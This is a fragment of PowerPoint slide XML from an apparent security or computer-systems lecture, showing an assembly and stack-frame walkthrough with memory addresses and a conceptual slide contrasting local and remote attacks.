                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b @ </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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c @ </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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 10.45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] + mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136316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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0x10000</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5851375" y="186318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478779" y="5313696"/>
            <a:ext cx="1652954"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2478779" y="5704802"/>
            <a:ext cx="1652954"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45609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2" grpId="0"/>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Remote vs. Local Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to manipulate the behavior of an application through local interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require a previously-established presence on the host (e.g., an account, or another application under the control of the attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to execute operations with privileges that are different (usually superior) from the ones that the attacker would otherwise have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general these attacks are easier to perform, because the attacker has a better knowledge of the environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to manipulate the behavior of an application through network-based interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthenticated remote attacks: Interaction with the application does not require authentication or prior capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to execute operations with the privileges of the vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general, are more difficult to perform but they do not require prior access to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116257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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0x10000</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5876776" y="213575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211812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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5851375" y="213575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1205950" y="348972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841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6"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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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82</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874101" y="2407962"/>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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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588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18"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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US">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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</a:t>
                      </a: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83</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
